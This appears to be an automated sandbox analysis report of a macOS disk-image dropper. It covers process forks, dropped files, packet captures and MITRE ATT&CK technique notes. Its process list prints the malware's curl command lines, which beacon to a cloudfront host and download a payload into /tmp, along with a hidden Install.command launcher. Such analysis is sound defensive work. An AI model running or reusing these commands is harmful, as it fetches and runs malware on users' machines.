sh New Fork (PID: 18863, Parent: 18860)

plutil (MD5: 1c2f3fe5fdcbb3b7b386088f70a385c1) Arguments: plutil -convert json -r -o - -- -

sh New Fork (PID: 18864, Parent: 18853)

sh New Fork (PID: 18865, Parent: 18864)

curl (MD5: 28fe026db67bee7a3e38a3e32ef21241) Arguments: curl -L http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=0&gs=1

sh New Fork (PID: 18866, Parent: 18853)

sh New Fork (PID: 18867, Parent: 18866)

curl (MD5: 28fe026db67bee7a3e38a3e32ef21241) Arguments: curl -L http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=1&gs=1

sh New Fork (PID: 18868, Parent: 18853)

sh New Fork (PID: 18869, Parent: 18868)

curl (MD5: 28fe026db67bee7a3e38a3e32ef21241) Arguments: curl -f0L -o /tmp/22EE15D2-4BC7-410C-BECA-0B2C62E78E2C/670A0417-65B8-493A-8E2A-3A956DAF169C http://d1wkiebwu8q7qk.cloudfront.net/sd/?c=ImdybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&o=10.14.4&b=9806121775&gs=1

sh New Fork (PID: 18870, Parent: 18853)

sh New Fork (PID: 18871, Parent: 18870)

curl (MD5: 28fe026db67bee7a3e38a3e32ef21241) Arguments: curl -L http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=3&gs=1

bash New Fork (PID: 18845, Parent: 18828)

killall (MD5: ca9725d13691858b17d910f4a50ba04c) Arguments: killall Terminal

bash New Fork (PID: 18847, Parent: 18822)

bash New Fork (PID: 18848, Parent: 18847)

bash New Fork (PID: 18850, Parent: 18848)

date (MD5: fee78358bcc451ab1861902b0b28709c) Arguments: /bin/date +%s

cleanup

Created / dropped Files

/Users/ben/.bash_sessions/6191FB1D-2813-41DB-BF02-7C8C726DDB8A.historynew Download File
Process:	/bin/bash
File Type:	ASCII text
Size (bytes):	49
Entropy (8bit):	4.22411871171893
Encrypted:	false
MD5:	3D64E1AFC4092349EAFF0FD43A50E94A
SHA1:	068BB67A2B7D7ED3D4CC58BA5FFC6063F622AC7E
SHA-256:	919EC904C51BEA093F78BC0B2A720EF5084F57A3011AA1EB48BDCB0B155A4754
SHA-512:	70BD6D3E11FCC25EC920B0D2AF36BBB2C12D175AAB382CDD82D66682D5B517C8DC75731C6651E69E67B901679AFE49336DFFAB1589EA99C54E87D38554E54712
Malicious:	false
Reputation:	low
Preview:	/Volumes/Install/.hidden/Install.command ; exit;.

/Users/ben/.bash_sessions/6191FB1D-2813-41DB-BF02-7C8C726DDB8A.session Download File
Process:	/bin/bash
File Type:	ASCII text
Size (bytes):	52
Entropy (8bit):	4.609496334425696
Encrypted:	false
MD5:	809CFC367F71725ECFE36C03540457D0
SHA1:	3E66685D3D67E993A1F941ABB4493258B0F456C3
SHA-256:	47021BF803944FF2F6819070452D58A30CDB5B8C6AE036412313DB11DB77C938
SHA-512:	49D23D3C5F2F93653EFED80A52E8478E0297CC1196FF9385A5F14F1B45DC6662391D57737497C15FA860B8FCD4FDC7DDF9D79C5E8321A404C6F716A4E78F432A
Malicious:	false
Reputation:	low
Preview:	echo Restored session: "$(/bin/date -r 1589455268)".

/dev/null Download File
Process:	/usr/bin/curl
File Type:	ASCII text, with CR, LF line terminators
Size (bytes):	317
Entropy (8bit):	2.970193051337526
Encrypted:	false
MD5:	E366B41BAD194FDD726766F35E91D09D
SHA1:	2218BB471D77EBB109695D13746E68460DC130B7
SHA-256:	2232B309AD0BAA2A3EFEE3BC034A8BD56E4A8754538030F43FC9D2657E77981A
SHA-512:	CD56F02CE9C0F66A33B8AE23BA3B0F2A3D784EB20FD504762FE30E9E3D1BC6937187F380569F6559549DAE750CF0166AD85080EAF6566BBE34070E1CC834C92A
Malicious:	false
Reputation:	low
Preview:	% Total % Received % Xferd Average Speed Time Time Time Current. Dload Upload Total Spent Left Speed.. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0.

/dev/ttys000 Download File
Process:	/bin/bash
File Type:	ASCII text, with escape sequences
Size (bytes):	143
Entropy (8bit):	4.908704537137689
Encrypted:	false
MD5:	02774B3833FD5A82B726591803EC50E1
SHA1:	DF938C025BBA10045C2ACDE2C634D49F8C6E16DC
SHA-256:	C9ED0450BA445DF03C5983C9CDDFA01AEAACCF593EB723BF206B542BA7C24D26
SHA-512:	84636C4D11FA05063340FED12DFFFB8E1183B8E3CEC41C459048987740CDDB8733E991342A6598D43242358DBFC6A8F9C4D3F069C4C1EF33A7F0DDAAADA9F934
Malicious:	false
Reputation:	low
Preview:	.]7;file://bens-Mac-mini.local/Users/ben..[?1034hbens-Mac-mini:~ ben$ /Volumes/Install/.hidden/Install.command ; exit;.logout.Saving session...

/private/tmp/oVlTmrVXYMfG/Qqsz1P2 Download File
Process:	/usr/bin/openssl
File Type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|BINDS_TO_WEAK\|PIE>
Size (bytes):	152052
Entropy (8bit):	5.900260681057816
Encrypted:	false
MD5:	38A84A69B3419F5AE798B64052FE6F7D
SHA1:	EA34EBA2A319F5339321830DE7E147DB130D9F5A
SHA-256:	CE35A4F31F04309F86DB9C777FEF61AF28834C75635FFBCE1AB76179C95D1A7E
SHA-512:	AD61ED3E6E72A39614E81C0991BF65FF552F5486A5DD3F516615B0EE90026108D060DF55743058A3D819DE7D3168E68425C39A83EBB0D11D43E55DDAAC5540A1
Malicious:	false
Reputation:	low
Preview:	..........................!.........H...__PAGEZERO..........................................................x...__TEXT..........................................................__text..........__TEXT..........................................................__stubs.........__TEXT..................d.......................................__stub_helper...__TEXT..........................................................__gcc_except_tab__TEXT..................<.......................................__cstring.......__TEXT..........<...............<...............................__const.........__TEXT..........@...............@...............................__unwind_info...__TEXT..................................................................__DATA..........................................................__nl_symbol_ptr.__DATA..............................................f...........__got...........__DATA..............................................h...........__la_symbol_ptr.__DATA..........

/private/var/run/utmpx Download File
Process:	/usr/bin/login
File Type:	data
Size (bytes):	1256
Entropy (8bit):	0.37980189927908775
Encrypted:	false
MD5:	9A92EDADEB95B3E999C9BC563CCB578D
SHA1:	23C8B429857B98D275172B7AD8E8CD93125533EE
SHA-256:	74A113B4D2777856196A998DED80B5EFB695AC11B110F49D00AE6F8CAA69B097
SHA-512:	94C46251E3F443D61C801FF417171BE31C7684EF9A31DF26673192AD7F970A8D6160BCDBA2D2240B4C76AFBCF4D72E3827E9C2717740A6728D9BDB9C6375BA9C
Malicious:	false
Reputation:	low
Preview:	ben.............................................................................................................................................................................................................................................................s000ttys000..........................I.......).^J/..................................................................................................................................................................................................................................................................................................................................ben.............................................................................................................................................................................................................................................................s000ttys000..........................I.......).^J/..................................................................

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
d1wkiebwu8q7qk.cloudfront.net	13.225.73.108	true	false		high

Contacted URLs

Name	Malicious	Reputation
http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=0&gs=1	false	high
http://d1wkiebwu8q7qk.cloudfront.net/sd/?c=ImdybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&o=10.14.4&b=9806121775&gs=1	false	high
http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=1&gs=1	false	high
http://d1wkiebwu8q7qk.cloudfront.net/slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=3&gs=1	false	high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	Flag	ASN	ASN Name	Malicious
13.225.73.108	United States		16509	unknown	false

Static File Info

General
File type:	zlib compressed data
Entropy (8bit):	7.979443181364741
TrID:	Disk Image (Macintosh), zlib, GPT (10001/1) 66.65% Pixlr layered image (2002/1) 13.34% Pivot stickfigure animation (2002/1) 13.34% XMill compressed XML (1001/1) 6.67%
File name:	G0Sr0fA5cv.dmg
File size:	377520
MD5:	a984037482afe318ac84ab2ee00e43fb
SHA1:	dd0c93c539361d9ff1241b3ebac7c4fd18ea8406
SHA256:	02835cb8f68488d57e55430bf6032bee84460ed9eb8f649a5e9e1838c3a0df4f
SHA512:	b59d7ac1aec203c94b6b234ec4486a0501abb2249a453c523512a853907ac8f43fa86f1eddf82a6a257f5c6437c67d4c170fcc12df16290a975fa434dfa040b1
SSDEEP:	6144:RsN9xfT4Q0arJRFHlrPoQs7G8XuyTbxz29zL71mOf3RKoBSapBRE24:OrplrPolXuC9WzL71BRzBppbE24
File Content Preview:	x.c`..C.......3....I......D..x.su.T.p..a``d.a``P..F.H.y.0_.B+A.uP.....J.Ns.4.I.........Pl.w.7.(.......~x...!.Aq......w....6.w....7CzA..AQ.........&..../.YI...2....#..`w/.~.<...8_.a~..I.mF..Y.I.................?o....x....k.e....y...rG.:.q.t..M..U.......15.

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 14, 2020 11:21:11.324412107 CEST	49313	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:11.332787991 CEST	80	49313	13.225.73.108	192.168.0.51
May 14, 2020 11:21:11.333273888 CEST	49313	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:11.333379030 CEST	49313	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:11.341739893 CEST	80	49313	13.225.73.108	192.168.0.51
May 14, 2020 11:21:11.649874926 CEST	80	49313	13.225.73.108	192.168.0.51
May 14, 2020 11:21:11.650353909 CEST	49313	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:11.651396990 CEST	49313	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:11.659574032 CEST	80	49313	13.225.73.108	192.168.0.51
May 14, 2020 11:21:11.659816980 CEST	49313	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:11.676203966 CEST	49314	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:11.684406996 CEST	80	49314	13.225.73.108	192.168.0.51
May 14, 2020 11:21:11.684700966 CEST	49314	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:11.684741020 CEST	49314	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:11.693274975 CEST	80	49314	13.225.73.108	192.168.0.51
May 14, 2020 11:21:12.006417036 CEST	80	49314	13.225.73.108	192.168.0.51
May 14, 2020 11:21:12.006859064 CEST	49314	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:12.009294987 CEST	49314	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:12.017657042 CEST	80	49314	13.225.73.108	192.168.0.51
May 14, 2020 11:21:12.019099951 CEST	49314	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:12.036643028 CEST	49315	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:12.044725895 CEST	80	49315	13.225.73.108	192.168.0.51
May 14, 2020 11:21:12.044943094 CEST	49315	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:12.045030117 CEST	49315	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:12.053652048 CEST	80	49315	13.225.73.108	192.168.0.51
May 14, 2020 11:21:12.219487906 CEST	80	49315	13.225.73.108	192.168.0.51
May 14, 2020 11:21:12.219513893 CEST	80	49315	13.225.73.108	192.168.0.51
May 14, 2020 11:21:12.219530106 CEST	80	49315	13.225.73.108	192.168.0.51
May 14, 2020 11:21:12.219796896 CEST	49315	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:12.219825029 CEST	49315	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:12.220716000 CEST	49315	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:12.229168892 CEST	80	49315	13.225.73.108	192.168.0.51
May 14, 2020 11:21:12.245313883 CEST	49316	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:12.254185915 CEST	80	49316	13.225.73.108	192.168.0.51
May 14, 2020 11:21:12.255594015 CEST	49316	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:12.255631924 CEST	49316	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:12.264153957 CEST	80	49316	13.225.73.108	192.168.0.51
May 14, 2020 11:21:12.413259983 CEST	80	49316	13.225.73.108	192.168.0.51
May 14, 2020 11:21:12.414606094 CEST	49316	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:12.415591002 CEST	49316	80	192.168.0.51	13.225.73.108
May 14, 2020 11:21:12.424242020 CEST	80	49316	13.225.73.108	192.168.0.51
May 14, 2020 11:21:12.425605059 CEST	49316	80	192.168.0.51	13.225.73.108

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 14, 2020 11:21:11.281963110 CEST	58291	53	192.168.0.51	8.8.8.8
May 14, 2020 11:21:11.312866926 CEST	53	58291	8.8.8.8	192.168.0.51
May 14, 2020 11:22:02.484797001 CEST	53419	53	192.168.0.51	8.8.8.8
May 14, 2020 11:22:02.501177073 CEST	53	53419	8.8.8.8	192.168.0.51

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 14, 2020 11:21:11.281963110 CEST	192.168.0.51	8.8.8.8	0x991a	Standard query (0)	d1wkiebwu8q7qk.cloudfront.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
May 14, 2020 11:21:11.312866926 CEST	8.8.8.8	192.168.0.51	0x991a	No error (0)	d1wkiebwu8q7qk.cloudfront.net	13.225.73.108	A (IP address)	IN (0x0001)
May 14, 2020 11:21:11.312866926 CEST	8.8.8.8	192.168.0.51	0x991a	No error (0)	d1wkiebwu8q7qk.cloudfront.net	13.225.73.227	A (IP address)	IN (0x0001)
May 14, 2020 11:21:11.312866926 CEST	8.8.8.8	192.168.0.51	0x991a	No error (0)	d1wkiebwu8q7qk.cloudfront.net	13.225.73.171	A (IP address)	IN (0x0001)
May 14, 2020 11:21:11.312866926 CEST	8.8.8.8	192.168.0.51	0x991a	No error (0)	d1wkiebwu8q7qk.cloudfront.net	13.225.73.37	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

d1wkiebwu8q7qk.cloudfront.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.0.51	49313	13.225.73.108	80

Timestamp	kBytes transferred	Direction	Data
May 14, 2020 11:21:11.333379030 CEST	0	OUT	GET /slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=0&gs=1 HTTP/1.1 Host: d1wkiebwu8q7qk.cloudfront.net User-Agent: curl/7.54.0 Accept: /
May 14, 2020 11:21:11.649874926 CEST	1	IN	HTTP/1.1 200 OK Content-Type: text/html Content-Length: 0 Connection: keep-alive Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Server: Microsoft-IIS/7.5 Access-Control-Allow-Origin: * X-AspNet-Version: 4.0.30319 p3p: CP="CAO PSA OUR" Date: Thu, 14 May 2020 09:21:10 GMT X-Cache: Miss from cloudfront Via: 1.1 04ce5a607a98db6d08257633417b84d7.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA2-C2 X-Amz-Cf-Id: tNcj7J0ZlLef4gZ5lRbFf7VdKWen767nIX0Dy0hwI4BLtI4qAkOOvw==

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.0.51	49314	13.225.73.108	80

Timestamp	kBytes transferred	Direction	Data
May 14, 2020 11:21:11.684741020 CEST	1	OUT	GET /slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=1&gs=1 HTTP/1.1 Host: d1wkiebwu8q7qk.cloudfront.net User-Agent: curl/7.54.0 Accept: /
May 14, 2020 11:21:12.006417036 CEST	2	IN	HTTP/1.1 200 OK Content-Type: text/html Content-Length: 0 Connection: keep-alive Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Server: Microsoft-IIS/7.5 Access-Control-Allow-Origin: * X-AspNet-Version: 4.0.30319 p3p: CP="CAO PSA OUR" Date: Thu, 14 May 2020 09:21:11 GMT X-Cache: Miss from cloudfront Via: 1.1 784dd167d622737126ee2d76985e7d3c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA2-C2 X-Amz-Cf-Id: oy1EBSVGURt7FI_iijawDCvTy1_gOVEJb1jVElcUflBneNi8J-08ww==

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.0.51	49315	13.225.73.108	80

Timestamp	kBytes transferred	Direction	Data
May 14, 2020 11:21:12.045030117 CEST	3	OUT	GET /sd/?c=ImdybQ==&u=FB2C97C6-63F5-5D81-A93F-BA4895BD7046&s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&o=10.14.4&b=9806121775&gs=1 HTTP/1.0 Host: d1wkiebwu8q7qk.cloudfront.net User-Agent: curl/7.54.0 Accept: /
May 14, 2020 11:21:12.219487906 CEST	4	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 1245 Connection: close Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Server: Microsoft-IIS/7.5 Access-Control-Allow-Origin: * X-AspNet-Version: 4.0.30319 p3p: CP="CAO PSA OUR" Date: Thu, 14 May 2020 09:21:12 GMT X-Cache: Error from cloudfront Via: 1.1 6c9a2d99a25484f38efa27d58a726b2d.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA2-C2 X-Amz-Cf-Id: QTqhiTeBI0MnpH6TE-ieuK0urxyObER7GaCgBzr4TxQ9ixi25rXZbg== Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margi
May 14, 2020 11:21:12.219513893 CEST	5	IN	Data Raw: 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 Data Ascii: n-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.0.51	49316	13.225.73.108	80

Timestamp	kBytes transferred	Direction	Data
May 14, 2020 11:21:12.255631924 CEST	5	OUT	GET /slg?s=22EE15D2-4BC7-410C-BECA-0B2C62E78E2C&c=3&gs=1 HTTP/1.1 Host: d1wkiebwu8q7qk.cloudfront.net User-Agent: curl/7.54.0 Accept: /
May 14, 2020 11:21:12.413259983 CEST	6	IN	HTTP/1.1 200 OK Content-Type: text/html Content-Length: 0 Connection: keep-alive Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Server: Microsoft-IIS/7.5 Access-Control-Allow-Origin: * X-AspNet-Version: 4.0.30319 p3p: CP="CAO PSA OUR" Date: Thu, 14 May 2020 09:21:12 GMT X-Cache: Miss from cloudfront Via: 1.1 6c9a2d99a25484f38efa27d58a726b2d.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA2-C2 X-Amz-Cf-Id: cDZEj71jnaCPCRNrrA4B6rDN4KykuCDDuqKr-R8gyEdTsH7oPJHI-A==

System Behavior

Analysis Process: Terminal PID: 18821 Parent PID: 321

General

Start time:	11:21:07
Start date:	14/05/2020
Path:	/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
Arguments:	n/a
File size:	1156656 bytes
MD5 hash:	a4bebc8ebbc11f7d16f489163827b3ff

Start time:	11:21:08
Start date:	14/05/2020
Path:	/bin/bash
Arguments:	-bash
File size:	618416 bytes
MD5 hash:	0313fd399b143fc40cd52a1679018305

Start time:	11:21:09
Start date:	14/05/2020
Path:	/bin/bash
Arguments:	n/a
File size:	618416 bytes
MD5 hash:	0313fd399b143fc40cd52a1679018305

Start time:	11:21:10
Start date:	14/05/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Start time:	11:21:11
Start date:	14/05/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Description:	Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. One example command-line interface on Windows systems is cmd , which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task ).
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion, Persistence
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may check for the presence of a virtual machine environment (VME) or sandbox to avoid potential detection of tools and activities. If the adversary detects a VME, they may alter their malware to conceal the core functions of the implant or disengage from the victim. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information from learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP . Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control, Lateral Movement
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.
Tactics:	Exfiltration
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

